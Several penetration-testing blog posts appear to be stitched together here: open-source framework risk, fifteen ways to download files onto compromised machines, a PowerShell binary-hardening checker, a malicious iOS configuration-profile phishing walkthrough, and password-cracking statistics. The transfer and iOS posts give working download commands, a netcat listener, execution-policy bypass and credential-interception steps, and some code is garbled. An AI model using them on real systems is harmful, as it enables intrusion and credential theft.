
Open Source Frameworks – How secure are they?

How many of your projects include open source software? Maybe it is better to call it free software. As a person who has spent time in the corporate world, I get the idea of using open source software. Much of it is free or at very low cost. However, is it secure and how do you go about proving that it is secure? For example, OpenSSL had the Heartbleed vulnerability in it for some time before it was discovered and disclosed.

If you are using a piece of software that was not written by your own company, how do you not realize that this software may have vulnerabilities in it that have not been discovered or disclosed? Make sure you find out, either by doing the work yourself or through a third party. We have had many companies tell us not to worry about the results from the open source software because it was not their software and they cannot or will not fix it. If you find vulnerabilities in this open source software, make sure you address them or at least mitigate them.

Right now, I am in the middle of a code review for a company that is using an open source framework. I looked it up and the framework has not been modified since July 2012. The framework they are using is full of vulnerabilities, including SQL Injection and cross-site scripting (both persistent and stored). If the person who wrote this code could do it wrong, they did. Out of the 10,000+ vulnerabilities found by the automated code review tool, almost 80% were for the framework.

For this company I am doing the code review for, I am going to recommend working with the framework’s author to address these vulnerabilities or to try to find a different framework. Maybe one that has been updated recently. I am also going to recommend they look at implementing a web application firewall. If not, they are going to have problems.

This framework is a good example of what not to do. Security vulnerabilities, attacks, programming languages, and tools have evolved to make your application much more secure, but your developers need to understand the concepts of secure coding techniques. You also need to evaluate the frameworks you are using and not assume they are safe.


15 Ways to Download a File

Pentesters often upload files to compromised boxes to help with privilege escalation, or to maintain a presence on the machine. This blog will cover 15 different ways to move files from your machine to a compromised system. It should be interesting for penetration testers who have a presence on a box and need post-exploitation options, and system admins that just want to move files.

There are many other ways to move files onto machines during pentests, but this list includes some of my favorites. Below is a summary of the file transfer techniques that will covered in this blog.

  1. PowerShell file download
  2. Visual Basic file download
  3. Perl file download
  4. Python file download
  5. Ruby file download
  6. PHP file download or upload
  7. FTP file download
  8. TFTP file download
  9. Bitsadmin file download
  10. Wget file download
  11. Netcat file download
  12. Windows share file download
  13. Notepad dialog box file download
  14. Exe to Text, Text to EXE with PowerShell and Nishang
  15. Csc.exe to compile from source file

Note: Many of the techniques listed should also be considered as options when executing commands through SQL injection. For the multi-line steps, ECHO the commands to a file, and then execute the file.

PowerShell File Download

PowerShell is one of those scripting languages that can be overlooked as a threat by administrators. However, it can provide a plethora of options and capabilities to someone who knows how to use it. The biggest benefit is that it is native to Windows since Windows Server 2003. Below is an example of a simple script that can be used to download a file to the local file system from a webserver on the internet:

$p = New-Object System.Net.WebClient $p.DownloadFile("https://domain/file" "C:%homepath%file") 

To execute this script, run the following command in a PowerShell window:

PS C:> .test.ps1

Sometimes, the PowerShell execution policy is set to restricted. In this case, you will not be able to execute commands or scripts through PowerShell… unless you just set it to unrestricted using the following command:

C:>powershell set-executionpolicy unrestricted

Visual Basic File Download

The final version of Visual Basic has come standard on Windows machines since 1998. The following script can download a file of your choosing. However, the script is quite larger than the PowerShell one.

Set args = Wscript.Arguments Url = "https://domain/file" dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", Url, False xHttp.Send with bStrm     .type = 1 '     .open     .write xHttp.responseBody     .savetofile " C:%homepath%file", 2 ' end with

Cscript is a command line Windows Script Host that allows you to pass command line options and allows you to set script properties. It is not necessary to use this to run a vbs script in Windows 7 and possibly others, but using it allows your scripts to run on Windows XP machines and above.

To execute this script, run the following command in a command shell:

C:>cscript test.vbs

The following four languages are non-native to windows machines. However, if you find a machine with any of these languages installed on them (regardless of the OS), you can leverage these scripts to download files.

Perl File Download

Perl is an extremely versatile scripting language that can be used for almost anything. Using Perl makes it super easy to download files onto the local host.

#!/usr/bin/perl use LWP::Simple; getstore("https://domain/file", "file");

To execute this script, run the following command in a command shell:

root@kali:~# perl

Python File Download

Python is a general purpose scripting language that emphasizes code readability. As with most scripting languages, the goal is to write less code than needed for a programming language, while still accomplishing the intended task.

#!/usr/bin/python import urllib2 u = urllib2.urlopen('https://domain/file') localFile = open('local_file', 'w') localFile.write( localFile.close()

To execute this script, run the following command in a command shell:

root@kali:~# python

Ruby File Download

Ruby is an object-oriented programming language that can be used for many things from creating frameworks (think Metasploit) to simple tasks such as downloading files.

#!/usr/bin/ruby require 'net/http' Net::HTTP.start("") { |http| r = http.get("/file") open("save_location", "wb") { |file| file.write(r.body) } }

To execute this script, run the following command in a command shell:

root@kali:~# ruby test.rb

PHP File Download

PHP is usually a server-side scripting language used for web development, but can also be used as a general purpose scripting language.

#!/usr/bin/php <?php         $data = @file("");         $lf = "local_file";         $fh = fopen($lf, 'w');         fwrite($fh, $data[0]);         fclose($fh); ?>

To execute this script, run the following command in a command shell:

root@kali:~# php test.php

The remaining ways to move files onto a target machine are through native operating system functions unless otherwise noted. Some of these require more steps than others, but can be used in different scenarios to bypass certain restrictions.

FTP File Download

For this method, an attacker would want to echo the FTP commands to a bash script since it generally requires user interaction to input a username and password. This bash script can then be run to have all the steps ran without the need for interaction.

ftp username password get file exit

TFTP File Download

Trivial FTP comes by default in Windows Vista and below. Note that you will have to set up the corresponding server to connect to. It can be run using the following command:

tftp -i host GET C:%homepath%file location_of_file_on_tftp_server

Bitsadmin File Download

Bitsadmin is a command-line tool for windows that allows a user to create download or upload tasks.

bitsadmin /transfer n https://domain/file c:%homepath%file

Wget File Download

Wget is a Linux and Windows tool that allows for non-interactive downloads.


Netcat File Download

Netcat can allow for downloading files by connecting to a specific listening port that will pass the contents of a file over the connection. Note that this example is Linux specific.

On the attackers computer, type:

cat file | nc -l 1234

This will print the contents of the file to the local port 1234. Then, whenever someone connects to that port, the contents of the file will be sent to the connecting IP.

The following command should be run on the machine the attacker is targeting:

nc host_ip 1234 > file

This will connect the target to the attacker’s computer and receive the file that will be sent over the connection.

Windows Share File Download

Windows shares can be mounted to a drive letter, and files can then be copied over by subsequent copy commands.

To mount a remote drive, type:

net use x: /user:example.comuserID myPassword

Notepad Dialog Box File Download

If you have access (RDP, physical, etc.) to a machine, but your user permissions do not allow you to open a web browser, this is a trick you can use to quickly download a file from a URL or a Universal Naming Convention (UNC) path. This also works well when you are breaking out of a locked-down application being run on a terminal.

  1. Open notepad
  2. Go to file – open
  3. In the File Name box near the bottom, type in the full URL path to your file
Rg Download File

Notepad is kind enough to go out and grab the contents of this file for you.

Exe to Txt, and Txt to Exe with PowerShell and Nishang

This is possibly one of my favorite tools to use when trying to move an exe to a machine. Nishang allows you to convert an exe to hex, then reassemble the hex into the original exe using PowerShell. I have seen group policies that do not allow for the transfer of exes through the RDP clipboard. Although it provides basic protection, it (sometimes) still allows the ability to copy text through the clipboard. In this scenario, you would be able to copy across the Nishang PowerShell source to a file on the box and rename the extension to .ps1. The Nishang script you want to copy is TexttoExe.ps1, and it is only 8 lines long. You can download Nishang here.

To convert the exe to a hex file, type:

PS > .ExetoText.ps1 evil.exe evil.txt

Open the evil.txt file and copy the contents. Then paste the contents to the target machine using the RDP clipboard. Do the same with the contents of the TexttoExe.ps1 file in Nishang.

To convert the hex file back to an exe, type:

PS > .TexttoExe.ps1 evil.text evil.exe

This will result in your evil exe being successfully moved to the target machine.

Csc.exe to Compile Source from a File

C sharp compiler (csc) is the command line compiler included with Microsoft .NET installations within Windows. This could be useful if you are unable to copy over an executable file, but can still copy over text. Using this method, combined with SQL injection, can move an exe to a box without having to try to bypass egress filters or authenticated proxies that might block outbound connectivity.

The default location for this executable is the following:


Using the following example code, the compiled executable will use cmd.exe to query the local users on the box and write the results to a file in the C:Temp directory. This could obviously be modified to interact with different exe’s on the box, or completely re-written to use your own exploit code.

public class Evil {    public static void Main()    {       System.Diagnostics.Process process = new System.Diagnostics.Process(); 	  System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo(); 	  startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; 	  startInfo.FileName = "cmd.exe"; 	  startInfo.Arguments = "/C net users > C:Tempusers.txt"; 	  process.StartInfo = startInfo; 	  process.Start();    } }

To compile your source code, type:

csc.exe /out:C:evilevil.exe C:evilevil.cs

Wrap up

Hopefully this blog has given you viable options for getting your files (malicious or otherwise) over to a server.


Verifying ASLR, DEP, and SafeSEH with PowerShell

Update: This post is a little bit out-of-date in regards to using the PowerShell script. Refer to the Github repo ( for an updated script and instructions on how to use it. Today I am releasing a PowerShell script that easily displays whether images (DLLs and EXEs) are compiled with ASLR (Address Space Layout Randomization), DEP (Data Execution Prevention), and SafeSEH (Structured Exception Handling). It is located at the github repo here: Without going into much detail, ASLR, DEP, and SafeSEH are considered best practices for all developers to implement as they help protect against users exploiting insecure code. As a side note, SafeSEH is only available when linking 32bit images. There are a few solutions out there that do this already, namely PEStudio, CFFExplorer, Windbg with plugins, and Immunity Debugger with However, I find that each of these are inefficient for scanning multiple files. PowerShell is a great solution for this because it is a native tool and can tap into the Windows API and carve out information within files. What I’m interested in are the PE (Portable Executable) headers within compiled 32bit and 64bit images. In simplistic terms, PE Headers contain all the information needed by Windows to run compiled images. Within PE headers there is an Optional Section that contains the DLLCharacteristics member. The DLLCharacteristic member is a hex value that provides information for compiled options in a file. It is set to the additive hex values contained in the following table:

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE0x0040The DLL can be relocated at load time.
IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY0x0080Code integrity checks are forced. If you set this flag and a section contains only uninitialized data, set the PointerToRawData member of IMAGE_SECTION_HEADER for that section to zero; otherwise, the image will fail to load because the digital signature cannot be verified.
IMAGE_DLLCHARACTERISTICS_NX_COMPAT0x0100The image is compatible with data execution prevention (DEP).
IMAGE_DLLCHARACTERISTICS_NO_ISOLATION0x0200The image is isolation aware, but should not be isolated.
IMAGE_DLLCHARACTERISTICS_NO_SEH0x0400The image does not use structured exception handling (SEH). No handlers can be called in this image.
IMAGE_DLLCHARACTERISTICS_NO_BIND0x0800Do not bind the image.
IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE0x8000The image is terminal server aware.

This table is from Microsoft and is located here ( You can see in the table that there are values pertaining to the status of ASLR (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE), DEP (IMAGE_DLLCHARACTERISTICS_NX_COMPAT), and SEH (IMAGE_DLLCHARACTERISTICS_NO_SEH) for a compiled image. Common DLLCharacteristics values are 140 for ASLR, DEP, and SEH, and 400 for no ASLR, DEP, and SEH. If  IMAGE_DLLCHARACTERISTICS_NO_SEH is true then there is no SEH and SafeSEH is not needed. As stated before, SafeSEH is only available for 32bit images. SafeSEH can also only be used if every linked module supports it. To verify SafeSEH we need to look at the SafeSEH fields which reside in the IMAGE_LOAD_CONFIG_DIRECTORY section of a PE. Within this structure are the SEHandlerTable, which holds the virtual address of a table of relative virtual addresses for each valid handler, and the SEHandlerCount, which is the number of handlers in the valid handler table from SEHandlerTable. If SafeSEH is not used, these members and sometimes the IMAGE_LOAD_CONFIG_DIRECTORY section itself will be empty.


Note: The name of the script has been change to Check-PESecurity.ps1. All of the flags still work correctly. The PEchecker PowerShell script utilizes C# code to create the relevant structs needed for the PE Header format. A big thank you to the PowerSploit project ( and the Get-PEHeader script for providing a lot of insight into doing this. PEchecker provides a lot of functionality. To begin, I will show how to look at a single file. Using the command:

Get-PESecurity –file "filename"

We can see a list view of the current file with the filename, architecture, and whether it is compiled with ASLR, DEP, and SafeSEH: Power Shell We can turn this into a table in PowerShell by piping it to the format-table function. Next we can use the directory switch to scan an entire directory of files for DLLs and EXEs.

Get-PESecurity –directory "directory"

Power Shell The directory command also has support for recusing through directories. To do this simply add the recursive switch:

Get-PESecurity –directory "directory" –recursive

I also added in support for filtering files based on ASLR, DEP, and SafeSEH. To do this, use the following switches: -OnlyNoASLR -OnlyNoDEP -OnlyNoSafeSeH A great piece of functionality in PowerShell is being able to export csv files from our results. To do this run the following command:

Get-PESecurity –directory "directory" –recursive | Export-Csv output.csv


How much can you trust your devices? In this blog post, we will cover a practical attack that utilizes the iPhone Configuration Utility, a malicious Mobile Device Management (MDM) server, and a little bit of social engineering to get you data from iOS devices, HTTP and HTTPS web traffic, and possibly domain credentials.

The Scenario:

To start this off, we will be sending out a .mobileconfig file to iOS devices at the HACKME company. This .mobileconfig file is created with the iPhone Configuration Utility (shown below) and will set up iOS devices to use a specific proxy host when connected to a specific Wi-Fi network. This proxy will be used later to capture HTTP and HTTPS traffic. Additionally, we will configure trusted certificates and an MDM server to use for (malicious) device management.

Our example will focus on getting users to install this .mobileconfig with a phishing email. The phishing email will come from and will have the .mobileconfig file attached. The email will encourage the iPhone owners to install the .mobileconfig to maintain compliance with company policy.

Once the target is phished and the profile is installed on their device, we will want their iOS device in range of our wireless access point. This could easily be done with a high powered Wi-Fi access point in the parking lot. If we want even closer access to our targets, we could send someone into the client building with a battery powered 3G/4G AP in a bag and have them run the attack from inside the building.

The Setup:

The first step in this attack is to set up our malicious .mobileconfig profile to send out with the phishing email. This .mobileconfig will have a default Wi-Fi network configured along with a proxy to use when connected to the Wi-Fi. For this demonstration, we will be showing screenshots from the Windows version of the iPhone Configuration Utility.

Wi-Fi Network Setup (with proxy settings)


If we are going to intercept HTTPS traffic, we are going to need a trusted root CA on the iOS device. This too can be done with the iPhone Configuration Utility. In this attack, we will be using the PortSwigger CA from the Burp proxy.


This config will then be exported to a .mobileconfig file, and we will send it along with the phishing email.


The only downside to this is the signing of the profile. As of now, it can be a pain to get these properly signed using Windows. The Apple device management utility allows you to specify certs to use for signing, so I would say use the Apple tool for exporting your profiles. Overall this won’t too big of a deal, if you’re assuming that people will not care about the “Not Verified” warning on the profile.


Once the user has the profile installed on their iOS device, we need to get in Wi-Fi range of their device. For simplicity’s sake, let’s say that we just tailgated into the office and set up shop in an empty office or conference room. A capture device, such as a RaspberryPi or laptop, and wireless AP (with 4G internet access) will be with us and running off of battery power. The capture device could also easily sit in a bag (purse, backpack, etc.) in an unlocked file cabinet. For our safety, we will lock the cabinet and take the key with us. We could then leave the devices for later retrieval, or have the capture device phone home for us to access the proxy logs remotely.

At this point, there should be some decent data coming through on the Wi-Fi traffic, but our main goal for this demo is to capture the exchange ActiveSync request. It looks like this:


You’ll see the Authorization token in the request header. This is actually the base64 encoded domain credentials (HACKMEhackmetest:P@ssword123!) for the iPhone user. Now that we have domain credentials, the rest of the escalation just got a lot easier.

We also set up a web clip to deploy to the iOS device. This fake app will be handy in the event that we’re unable to get the ActiveSync credentials. The app will look like a branded HACKME company application that opens a web page in Safari containing a login prompt. The malicious site will store any entered credentials and fail on attempts to login. So even if we’re not on the same Wi-Fi network, we might be able to get credentials.


One additional item to think about is that these profiles do not have to be deployed via email. If an attacker has access to an unlocked device and the passcode, they may be able to install the profile to the iOS device via USB. This attack can be particularly applicable to kiosk iOS devices that allow physical access to their lightning/30-pin connectors.

Finally, all of this can be continually manipulated if you set up an MDM server for the device to connect to, but we’ll save that for another blog.


Don’t leave device management up to your users. If you are using iOS devices in your environment, lock the devices down and prevent users from installing their own configurations. More importantly, go and configure your company devices before an attacker does it for you.


Cracking Stats for Q1 2014

During many of our penetration tests, we gather domain password hashes (with permission of the client) for offline cracking and analysis. This blog is a quick summary of the hashes that we attempted to crack in the first quarter of 2014. The plan is to do this again each quarter for the rest of the year to see how we did overall for the year.

There was a relatively small sample for this quarter: just three sets of domain hashes that added up to 10,050 hashes. We are frequently in environments with twice as many users (20k and up), so this is a pretty limited set. One of these sets had LM hashes stored along with the NTLM hashes, making our cracking efforts a little bit easier. Of these hashes, 2,583 were duplicates, leaving 7,184 unique hashes. Of the 10,050 hashes, we were able to crack 7,510 (74.73%).

Q1 Cracking Hashes

Cracked Password Length Breakdown:

Cracked Password

As you can see, the cracked passwords peak at the eight character length. This is pretty common for a minimum password length, so it’s not a big surprise that this is the most common length cracked.

Some more interesting finds:

  • Most Common Password (606 instances): Password1
  • Longest Password: 19 characters – visualmerchandising
  • Most Common Length (3,356 instances): 8 characters
  • Instances of “password” (case-insensitive): 122
  • Instances of [ClientName] (case-insensitive, no modifications, and redacted for obvious reasons): 284
  • Instances of “winter2014” (case-insensitive): 3
  • Instances of “winter14” (case-insensitive): 4
  • Instances of “spring2014” (case-insensitive): 5
  • Instances of “spring14” (case-insensitive): 8

In terms of effort that we put in on each of these hashes, we ran our typical twenty-four hour process on each of the hash files during each of the pentests. Since we keep a dictionary of all of the previously cracked hashes, this made it easier to re-run some of the cracking efforts with the already cracked hashes as a start. We added in some additional cracking time to really go after these hashes, but that was mostly brute force effort.

I put together an hcmask file (to use with oclHashcat) of our top forty password patterns that were identified for this quarter. You can download it here – Q1Masks. I plan on keeping up with this each quarter, so check back in July to see how this mask file has changed by second quarter and how well we’ve done over the first half of the year.

For more information on how we built our GPU-enhanced password cracking box, check out this presentation we recently did at Secure360:

GPU Cracking – On The Cheap

For a general outline of our password cracking methodology check out this post:

GPU Password Cracking – Building a Better Methodology

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